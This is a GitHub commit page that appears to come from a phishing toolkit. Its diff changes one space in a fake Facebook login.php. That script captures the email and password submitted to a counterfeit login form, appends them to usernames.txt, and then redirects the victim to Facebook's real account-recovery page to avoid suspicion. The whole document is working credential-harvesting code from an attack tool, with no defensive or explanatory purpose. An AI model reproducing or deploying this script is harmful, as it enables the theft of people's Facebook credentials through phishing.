Skip to content

Commit

Permalink
Minor Fix for Facebook/login.php (Just a space)
Browse files Browse the repository at this point in the history
  • Loading branch information
htr-tech committed Mar 9, 2022
1 parent e159dae commit a400acf
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .sites/facebook/login.php
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
<?php
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] ."\n", FILE_APPEND);
header('Location: https://facebook.com/recover/initiate/');
exit();
?>

0 comments on commit a400acf

Please sign in to comment.